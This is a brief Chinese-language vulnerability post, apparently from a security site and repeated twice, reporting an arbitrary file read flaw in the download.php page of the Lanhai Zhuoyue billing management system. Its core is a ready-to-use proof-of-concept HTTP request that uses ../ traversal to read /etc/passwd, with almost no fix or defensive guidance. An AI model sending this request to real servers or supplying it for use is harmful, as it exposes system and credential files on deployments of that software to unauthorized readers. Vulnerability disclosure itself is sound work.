# 蓝海卓越计费管理系统 任意文件读取漏洞
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.
poc:
“`
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
“`
via:peiqi
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
# 蓝海卓越计费管理系统 任意文件读取漏洞
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件.
poc:
“`
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host:
“`
via:peiqi
请登录后查看评论内容